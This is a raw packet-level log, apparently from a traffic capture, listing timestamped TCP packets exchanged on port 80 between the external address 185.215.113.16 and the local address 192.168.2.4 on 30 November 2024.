Nov 30, 2024 04:06:45.166671038 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.167521954 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.167625904 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.168381929 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.168447971 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.168471098 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.168565989 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.168582916 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.169481039 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.169594049 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.170376062 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.170497894 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.170988083 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.171338081 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.171422958 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.172297955 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.172447920 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.173263073 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.173356056 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.174204111 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.176867962 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.302938938 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.302990913 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.303047895 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.303093910 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.303390980 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.303438902 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.303500891 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.303545952 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.304357052 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.304402113 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.304459095 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.304506063 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.305351973 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.305397034 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.305474043 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.305521965 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.306294918 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.306340933 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.306395054 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.306437969 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.307235003 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.307281017 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.307351112 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.307400942 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.308207035 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.308300972 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.308366060 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.331820965 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.331927061 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.331954002 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.332006931 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.332269907 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.332330942 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.332364082 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.332411051 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.333223104 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.333276033 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.333328009 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.333374023 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.336437941 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.336492062 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.337373018 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.337385893 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.337399960 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.337414980 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.337418079 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.337431908 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.337435007 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.337461948 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.337908983 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.337961912 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.338049889 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.338104963 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.338526011 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.338540077 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.338573933 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.338583946 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.338973045 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.339023113 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.339088917 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.339133978 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.339942932 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.340050936 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.340074062 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.340116024 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.340898037 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.340945959 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.341016054 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.341068029 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.341860056 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.341901064 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.341957092 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.341999054 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.342813015 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.342935085 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.342947006 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.343126059 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.343777895 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.343827009 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.343879938 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.343961954 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.344754934 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.344799995 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.344856024 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.344904900 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.345729113 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.345776081 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.345830917 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.345876932 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.346700907 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.346785069 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.346813917 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.346853018 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.347632885 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.347683907 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.347754002 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.347800970 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.348583937 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.348635912 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.348696947 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.348743916 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.349534988 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.349584103 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.349637032 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.349684954 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.350492001 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.350533962 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.350608110 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.350653887 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.351471901 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.351555109 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.351665020 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.352423906 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.352473974 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.352530003 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.352576017 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.353370905 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.353418112 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.353486061 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.353518963 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.354336023 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.354387045 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.354443073 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.354490042 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.355304956 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.355349064 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.355403900 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.355498075 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.356354952 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.356466055 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.356489897 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.356538057 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.357304096 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.357332945 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.357353926 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.357382059 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.358243942 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.358293056 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.358362913 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.358400106 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.359149933 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.359196901 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.359265089 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.359304905 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.360106945 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.360152960 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.360332012 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.360378981 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.361053944 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.361102104 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.361174107 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.361222982 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.362008095 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.362054110 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.362123013 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.362176895 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.362974882 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.363018036 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.363080978 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.363116980 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.363956928 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.363997936 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.364058018 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.364097118 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.364903927 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.364949942 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.365015984 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.365063906 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.365868092 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.365915060 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.365995884 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.366041899 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.366837978 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.366884947 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.366987944 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.367034912 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.367772102 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.367826939 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.367918968 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.367968082 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.368757963 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.368805885 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.368807077 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.368855000 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.369702101 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.369744062 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.369776964 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.369820118 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.370637894 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.370687008 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.370754004 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.370800018 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.371618032 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.371661901 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.371731043 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.371788025 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.372586012 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.372697115 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.372699976 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.372781038 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.373547077 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.373591900 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.373656034 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.373701096 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.374490976 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.374536037 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.374562979 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.374607086 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.375462055 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.375510931 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.508444071 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.508604050 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.508764982 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.509041071 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.509891033 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.510052919 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.510878086 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.510893106 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.511897087 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.511955023 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.512075901 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.512922049 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.513079882 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.513334990 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.513865948 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.513955116 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.514013052 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.517273903 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.537149906 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.537214994 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.537276983 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.537326097 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.537787914 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.537837029 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.537905931 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.537955046 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.538760900 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.538830042 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.538899899 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.538947105 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.539707899 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.539721966 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.539755106 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.539776087 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.540707111 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.540721893 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.540756941 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.540767908 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.541713953 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.541771889 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.541896105 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.541939974 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.542588949 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.542644024 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.542735100 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.542848110 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.543567896 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.543617964 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.543747902 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.543797016 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.544632912 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.544683933 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.544815063 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.544857025 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.545573950 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.545588017 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.545625925 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.546492100 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.546504021 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.546541929 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.547487020 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.547498941 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.547534943 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.548485041 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.548501968 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.548530102 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.548538923 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.549362898 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.549416065 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.549488068 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.549541950 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.550422907 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.550436020 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.550472021 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.551330090 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.551378012 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.551506042 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.551552057 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.552272081 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.552309990 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.552460909 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.552512884 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.553232908 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.553282022 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.553407907 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.553450108 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.554081917 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.554130077 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.554255962 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.554296017 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.555172920 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.555226088 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.555356026 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.555403948 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.556000948 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.556050062 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.556179047 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.556226015 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.557188988 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.557202101 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.557226896 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.557255030 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.557981968 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.558027983 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.558239937 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.558288097 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.558979034 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.559026957 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.559156895 CET	80	49840	185.215.113.16	192.168.2.4
